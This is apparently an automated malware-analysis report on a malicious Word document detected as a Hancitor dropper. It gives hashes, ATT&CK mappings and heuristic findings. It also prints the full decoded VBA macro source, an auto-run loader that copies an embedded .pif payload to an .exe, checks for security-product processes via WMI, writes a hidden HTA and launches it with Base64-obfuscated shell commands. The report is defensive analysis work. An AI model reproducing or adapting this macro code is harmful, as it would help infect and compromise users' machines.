Office (OLE) malware analysis — malicious · 3ec7162f0dd1eab4

MALICIOUS

Office (OLE)

259.0 KB Created: 2018-10-10 13:54:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: 45230efa2ac42b1da4f5dd95bbfded37 SHA-1: f955495a4cddf3ab9172b99a5044ec0f92730854 SHA-256: 3ec7162f0dd1eab4849db9a24551a2bcee61e52a61bf4a8ba3d9598e96a5d2a3

720 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1566.001 Spearphishing Attachment

This document contains VBA macros that execute upon opening, including a Document_Open subroutine. The macros utilize ShellExecute, LoadLibrary, and VirtualProtect APIs, and a Base64-decoded shell command stager is present. The presence of Ole10Native package dropping an auto-executable payload, combined with the ClamAV detection of 'Doc.Dropper.Hancitor-6774061-0', strongly indicates a dropper functionality. The decoded command 'cmd.exe /c ping localhost -n 100 &&' suggests an attempt to delay execution or establish a foothold before further action.

Heuristics 19

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0

XOR-encoded strings (key 0x78) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x78: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

x86 disassembly · validity: uncertain (0.584) — 0/5 branch targets land on an instruction boundary (0% coherence)

00026273  3417              xor al, 0x17
00026275  191c34            sbb dword ptr [esp + esi], ebx
00026278  111a              adc dword ptr [edx], ebx
0002627A  0a19              or bl, byte ptr [ecx]
0002627C  0a01              or al, byte ptr [ecx]
0002627E  3978fb            cmp dword ptr [eax - 5], edi
00026281  b87bf1fd60        mov eax, 0x60fdf17b
00026286  87878720f3fd      xchg dword ptr [edi - 0x20cdf79], eax
0002628C  60                pushal
0002628D  87878728f335      xchg dword ptr [edi + 0x35f32887], eax
00026293  8829              mov byte ptr [ecx], ch
00026295  872da0f1fd4c      xchg dword ptr [0x4cfdf1a0], ebp
0002629B  878787289078      xchg dword ptr [edi + 0x78902887], eax
000262A1  7878              js 0x2631b
000262A3  7820              js 0x262c5
000262A5  93                xchg ebx, eax
000262A6  752e              jne 0x262d6
000262A8  110a              adc dword ptr [edx], ecx
000262AA  0c0d              or al, 0xd
000262AC  191439            sbb dword ptr [ecx + edi], edx
000262AF  1414              adc al, 0x14
000262B1  17                pop ss
000262B2  1b78fb            sbb edi, dword ptr [eax - 5]
000262B5  b87bf1fd40        mov eax, 0x40fdf17b
000262BA  87878720f3ed      xchg dword ptr [edi - 0x120cdf79], eax
000262C0  40                inc eax
000262C1  8787872af33d      xchg dword ptr [edi + 0x3df32a87], eax
000262C7  8828              mov byte ptr [eax], ch
000262C9  872da0f13dc0      xchg dword ptr [0xc03df1a0], ebp
000262CF  28                .byte 0x28
000262D0  90                nop
000262D1  7878              js 0x2634b

Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER

Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)

GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Open Environ("Temp") & "\1.hta" For Output As #1
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6528 bytes
SHA-256: `76c4454e6102794004230c7df6890f3b545e67e7a5187a50a8250fc22dcc5b20`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set D = New DataObject D.SetText " " D.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 15, t) Dim kjfaa kjfaa = "bd" & "agent.exe" Dim yrtfdsad, vcxvxczcv Dim mbbmbdf Set vcxvxczcv = GetObject("wi" & "nmgmts:") Dim gfdfsfsfs Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process") Dim hdffsdfs For Each x In yrtfdsad Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text) Dim pipec As Boolean: pipec = True If x.Name = kjfaa Then Dim lhjxvcvx lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode) Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, lhjxvcvx Close #1 ChDir Environ("Temp") wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If If x.Name = "n360.exe" Then Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() ChDir Environ("Temp") Selection.TypeBackspace Call kklk Call fadf End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub fadf() kk = ".p" & "if" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif" End Sub Attribute VB_Name = "UserForm3" Attribute VB_Base = "0{98724B47-B6B1-4ACE-A61D-68A71704E485}{D4E86E16-6812-4454-A79B-F0F8445F873E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{6E5DDC7C-02D6-42D7-8C2B-464A67B87231}{5A3B6867-AEB6-42C7-947F-2780DE25BC20}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module5" Sub kklk() ChDir Environ("Temp") Dim kk, lll, jgf, tyretw, gdfsfsa jgf = "x" & "e" kk = ".p" & "if" lll = "6" & ".e" Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{A8BE1721-343B-43FD-8170-3048F0850358}{F01B3F9F-3293-4142-91F9-90FF9B3DB8AA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm4" Attribute VB_Base = "0{9273F296-A00B-40A9-BA2D-E27C576ACCC5}{EEC3516B-03C1-4094-89AD-1FE03D9AE4C2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1600659599/Ole10Native	95984 bytes
SHA-256: `fd7410024c4bedb16ce9c44de1b9817c7366e3f3eea112bd8d318518ce317b7a`
`ole10native_00_5C.pif`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1600659599/Ole10Native; display_name=5C.pif; full_path=C:\Users\Admin\AppData\Local\Temp\5C.pif; temp_path=; def_file=	95744 bytes
SHA-256: `0faba459f37dd11ad44631f644062421a9efed20b511279c9adfd0dc4729c0f5`

Open this report in the interactive analyzer, or submit your own file for analysis.